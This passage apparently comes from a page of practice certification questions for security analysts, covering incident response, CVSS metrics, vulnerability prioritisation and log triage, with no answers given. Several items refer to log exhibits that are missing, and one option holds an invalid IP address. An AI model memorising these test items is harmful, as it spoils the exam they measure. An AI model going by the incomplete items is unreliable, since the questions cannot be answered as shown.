Researching federal laws, regulatory compliance requirements, and organizational policies to document specific reporting SLAs

C.

Defining which security incidents require external notifications and incident reporting in addition to internal stakeholders

D.

Designating specific roles and responsibilities within the security team and stakeholders to streamline tasks

Question 100

The analyst reviews the following endpoint log entry:

Question # 100

Which of the following has occurred?

Options:

A.

Registry change

B.

Rename computer

C.

New account introduced

D.

Privilege escalation

Question 101

Which of the following is the best authentication method to secure access to sensitive data?

Options:

A.

An assigned device that generates a randomized code for login

B.

Biometrics and a device with a personalized code for login

C.

Alphanumeric/special character username and passphrase for login

D.

A one-time code received by email and push authorization for login

Question 102

An analyst views the following log entries:

Question # 102

The organization has a partner vendor with hosts in the 216.122.5.x range. This partner vendor is required to have access to monthly reports and is the only external vendor with authorized access. The organization prioritizes incident investigation according to the following hierarchy: unauthorized data disclosure is more critical than denial of service attempts.

which are more important than ensuring vendor data access.

Based on the log files and the organization's priorities, which of the following hosts warrants additional investigation?

Options:

A.

121.19.30.221

B.

134.17.188.5

C.

202.180.1582

D.

216.122.5.5

Question 103

An analyst reviews a recent government alert on new zero-day threats and finds the following CVE metrics for the most critical of the vulnerabilities:

CVSS: 3.1/AV:N/AC: L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:W/RC:R

Which of the following represents the exploit code maturity of this critical vulnerability?

Options:

A.

E:U

B.

S:C

C.

RC:R

D.

AV:N

E.

AC:L

Question 104

A vulnerability analyst is writing a report documenting the newest, most critical vulnerabilities identified in the past month. Which of the following public MITRE repositories would be best to review?

Options:

A.

Cyber Threat Intelligence

B.

Common Vulnerabilities and Exposures

C.

Cyber Analytics Repository

D.

ATT&CK

Question 105

A manufacturer has hired a third-party consultant to assess the security of an OT network that includes both fragile and legacy equipment Which of the following must be considered to ensure the consultant does no harm to operations?

Options:

A.

Employing Nmap Scripting Engine scanning techniques

B.

Preserving the state of PLC ladder logic prior to scanning

C.

Using passive instead of active vulnerability scans

D.

Running scans during off-peak manufacturing hours

Question 106

A security team identified several rogue Wi-Fi access points during the most recent network scan. The network scans occur once per quarter. Which of the following controls would best all ow the organization to identity rogue

devices more quickly?

Options:

A.

Implement a continuous monitoring policy.

B.

Implement a BYOD policy.

C.

Implement a portable wireless scanning policy.

D.

Change the frequency of network scans to once per month.

Question 107

A security analyst must assist the IT department with creating a phased plan for vulnerability patching that meets established SLAs.

Which of the following vulnerability management elements will best assist with prioritizing a successful plan?

Options:

A.

Affected hosts

B.

Risk score

C.

Mitigation strategy

D.

Annual recurrence

Question 108

A company patches its servers using automation software. Remote SSH or RDP connections are allowed to the servers only from the service account used by the automation software. All servers are in an internal subnet without direct access to or from the internet. An analyst reviews the following vulnerability summary:

Question # 108

Which of the following vulnerability IDs should the analyst address first?

Options:

A.

1

B.

2

C.

3

D.

4

Question 109

Several critical bugs were identified during a vulnerability scan. The SLA risk requirement is that all critical vulnerabilities should be patched within 24 hours. After sending a notification to the asset owners, the patch cannot be deployed due to planned, routine system upgrades Which of the following is the best method to remediate the bugs?

Options:

A.

Reschedule the upgrade and deploy the patch

B.

Request an exception to exclude the patch from installation

C.

Update the risk register and request a change to the SLA

D.

Notify the incident response team and rerun the vulnerability scan

Question 110

A security analyst needs to identify a computer based on the following requirements to be mitigated:

    The attack method is network-based with low complexity.

    No privileges or user action is needed.

    The confidentiality and availability level is high, with a low integrity level.

Given the following CVSS 3.1 output:

    Computer1: CVSS3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:H

    Computer2: CVSS3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H

    Computer3: CVSS3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:H

    Computer4: CVSS3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H

Which of the following machines should the analyst mitigate?

Options:

A.

Computer1

B.

Computer2

C.

Computer3

D.

Computer4

Question 111

A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes. Which of the following is the most likely scenario occurring with the time stamps?

Options:

A.

The NTP server is not configured on the host.

B.

The cybersecurity analyst is looking at the wrong information.

C.

The firewall is using UTC time.

D.

The host with the logs is offline.

Question 112

A cybersecurity team lead is developing metrics to present in the weekly executive briefs. Executives are interested in knowing how long it takes to stop the spread of malware that enters the network.

Which of the following metrics should the team lead include in the briefs?

Options:

A.

Mean time between failures

B.

Mean time to detect

C.

Mean time to remediate

D.

Mean time to contain

Question 113

Each time a vulnerability assessment team shares the regular report with other teams, inconsistencies regarding versions and patches in the existing infrastructure are discovered. Which of the following is the best solution to decrease the inconsistencies?

Options:

A.

Implementing credentialed scanning

B.

Changing from a passive to an active scanning approach

C.

Implementing a central place to manage IT assets

D.

Performing agentless scanning

Question 114

A Chief Information Security Officer wants to map all the attack vectors that the company faces each day. Which of the following recommendations should the company align their security controls around?

Options:

A.

OSSTMM

B.

Diamond Model Of Intrusion Analysis

C.

OWASP

D.

MITRE ATT&CK

Question 115

A security analyst recently used Arachni to perform a vulnerability assessment of a newly developed web application. The analyst is concerned about the following output:

[+] XSS: In form input 'txtSearch' with action https://localhost/search.aspx

[-] XSS: Analyzing response #1...

[-] XSS: Analyzing response #2...

[-] XSS: Analyzing response #3...

[+] XSS: Response is tainted. Looking for proof of the vulnerability.

Which of the following is the most likely reason for this vulnerability?

Options:

A.

The developer set input validation protection on the specific field of search.aspx.

B.

The developer did not set proper cross-site scripting protections in the header.

C.

The developer did not implement default protections in the web application build.

D.

The developer did not set proper cross-site request forgery protections.

Question 116

An attacker has just gained access to the syslog server on a LAN. Reviewing the syslog entries has allowed the attacker to prioritize possible next targets. Which of the following is this an example of?

Options:

A.

Passive network foot printing

B.

OS fingerprinting

C.

Service port identification

D.

Application versioning

Question 117

Which of the following would eliminate the need for different passwords for a variety or internal application?

Options:

A.

CASB

B.

SSO

C.

PAM

D.

MFA

Question 118

An organization has implemented code into a production environment. During a routine test, a penetration tester found that some of the code had a backdoor implemented, causing a developer to make changes outside of the change management windows. Which of the following is the best way to prevent this issue?

Options:

A.

SDLC training

B.

Dynamic analysis

C.

Debugging

D.

Source code review

Question 119

During a cybersecurity incident, one of the web servers at the perimeter network was affected by ransomware. Which of the following actions should be performed immediately?

Options:

A.

Shut down the server.

B.

Reimage the server

C.

Quarantine the server

D.

Update the OS to latest version.

Question 120

A company recently removed administrator rights from all of its end user workstations. An analyst uses CVSSv3.1 exploitability metrics to prioritize the vulnerabilities for the workstations and produces the following information:

Question # 120

Which of the following vulnerabilities should be prioritized for remediation?

Options:

A.

nessie.explosion

B.

vote.4p

C.

sweet.bike

D.

great.skills

Question 121

A security analyst has just received an incident ticket regarding a ransomware attack. Which of the following would most likely help an analyst properly triage the ticket?

Options:

A.

Incident response plan

B.

Lessons learned

C.

Playbook

D.

Tabletop exercise

Question 122

A security analyst detects an email server that had been compromised in the internal network. Users have been reporting strange messages in their email inboxes and unusual network traffic. Which of the following incident response steps should be performed next?

Options:

A.

Preparation

B.

Validation

C.

Containment

D.

Eradication

Question 123

An incident response team is assessing attack vectors of malware that is encrypting data with ransomware. There are no indications of a network-based intrusion.

Which of the following is the most likely root cause of the incident?

Options:

A.

USB drop

B.

LFI

C.

Cross-site forgery

D.

SQL injection

Question 124

An organization has a critical financial application hosted online that does not allow event logging to send to the corporate SIEM. Which of the following is the best option for the security analyst to configure to improve the efficiency of security operations?

Options:

A.

Configure a new SIEM specific to the management of the hosted environment.

B.

Subscribe to a threat feed related to the vendor's application.

C.

Use a vendor-provided API to automate pulling the logs in real time.

D.

Download and manually import the logs outside of business hours.

Question 125

Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident?

Options:

A.

The lead should review what is documented in the incident response policy or plan

B.

Management level members of the CSIRT should make that decision

C.

The lead has the authority to decide who to communicate with at any time

D.

Subject matter experts on the team should communicate with others within the specified area of expertise

Question 126

Which of the following items should be included in a vulnerability scan report? (Choose two.)

Options:

A.

Lessons learned

B.

Service-level agreement

C.

Playbook

D.

Affected hosts

E.

Risk score

F.

Education plan

Question 127

A SOC team lead occasionally collects some DNS information for investigations. The team lead assigns this task to a new junior analyst. Which of the following is the best way to relay the process information to the junior analyst?

Options:

A.

Ask another team member to demonstrate their process.

B.

Email a link to a website that shows someone demonstrating a similar process.

C.

Let the junior analyst research and develop a process.

D.

Write a step-by-step document on the team wiki outlining the process.

Page: 1 / 42
Total 424 questions